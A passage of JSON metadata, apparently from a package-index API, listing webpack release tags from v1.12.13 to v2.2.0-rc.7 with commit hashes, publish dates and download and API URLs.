m/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_u